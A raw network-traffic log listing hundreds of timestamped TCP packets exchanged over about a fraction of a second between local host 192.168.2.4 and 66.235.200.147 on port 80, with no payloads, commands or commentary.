Jan 4, 2023 16:47:45.430388927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430402040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430416107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430429935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430444956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430455923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430471897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430483103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430499077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430510998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430530071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430537939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430550098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430566072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430583954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430593967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430607080 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430622101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430635929 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430649042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430664062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430675030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430697918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430716991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430722952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430746078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430764914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430773020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430787086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430800915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430823088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430828094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430844069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430855036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430876970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430885077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430896044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430912018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430931091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430938959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430960894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430967093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430979967 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430994034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431015968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431021929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431035995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431047916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431066036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431077003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431098938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431107044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431118011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431135893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431154966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431164026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431184053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431190968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431202888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431220055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431241035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431246042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431262970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431273937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431301117 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431313038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431329012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431329966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431355000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431361914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431380987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431387901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431407928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431415081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431435108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431459904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431462049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431488991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431489944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431515932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431523085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431543112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431548119 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431569099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431572914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431596041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431597948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431622982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431622982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431649923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431653023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431677103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431696892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431704044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431727886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431731939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431761980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431776047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431786060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431804895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431821108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431832075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431849957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431859970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431878090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431886911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431898117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431914091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431931973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431941986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431960106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431967974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.431982040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.431993961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432014942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432019949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432035923 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432048082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432070017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432075977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432087898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432102919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432122946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432130098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432142973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432157040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432174921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432183981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432199001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432209969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432230949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432236910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432251930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432262897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432285070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432290077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432312965 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432315111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432341099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432353020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432364941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432368994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432393074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432394981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432418108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432418108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432439089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432446003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432460070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432473898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432491064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432501078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432518005 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432528973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432545900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432555914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432564974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432580948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432598114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432609081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432621956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432635069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432651997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432667017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432682037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432693005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432712078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432718992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432730913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432746887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432763100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432774067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432789087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432802916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432815075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432830095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432845116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432856083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432873011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432883024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432892084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432909012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432929993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432935953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432951927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432964087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.432982922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.432991028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433002949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433017969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433032036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433043957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433065891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433068991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433089018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433095932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433106899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433123112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433140993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433149099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433161974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433176041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433195114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433202982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433216095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433231115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433252096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433258057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433276892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433284998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433298111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433311939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433330059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433337927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433355093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433365107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433377981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433391094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433408976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433417082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433429003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433444977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433460951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433470964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433485985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433495998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433516026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433521986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.433537960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.433568001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.450329065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.450362921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.450443983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.450489044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.451050997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.451081038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.451107025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.451112032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.451145887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.451173067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.451193094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.451237917 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.451270103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.451320887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.451349020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.451396942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.451396942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.451446056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.451586008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.451637030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.451746941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.451793909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.451905966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.451934099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.451958895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.451980114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.452187061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.452244997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.452266932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.452295065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.452320099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.452429056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.452457905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.452464104 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.452481985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.452485085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.452517033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.452541113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.452552080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.452579021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.452599049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.452622890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.452626944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.452671051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.452734947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.452763081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.452785969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.452789068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.452811003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.452852011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.452893972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.452975988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453108072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453171015 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453176022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453222036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453232050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453277111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453283072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453325033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453330994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453378916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453387976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453419924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453427076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453461885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453465939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453506947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453516006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453558922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453562021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453603029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453603029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453641891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453646898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453686953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453689098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453732967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453742981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453768969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453783989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453813076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453813076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453857899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453861952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453903913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453916073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453919888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453948975 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.453968048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.453969955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454006910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454015017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454040051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454051018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454073906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454086065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454107046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454118013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454139948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454153061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454173088 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454193115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454215050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454216003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454256058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454261065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454292059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454301119 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454334021 CET	80	49696	66.235.200.147	192.168.2.4
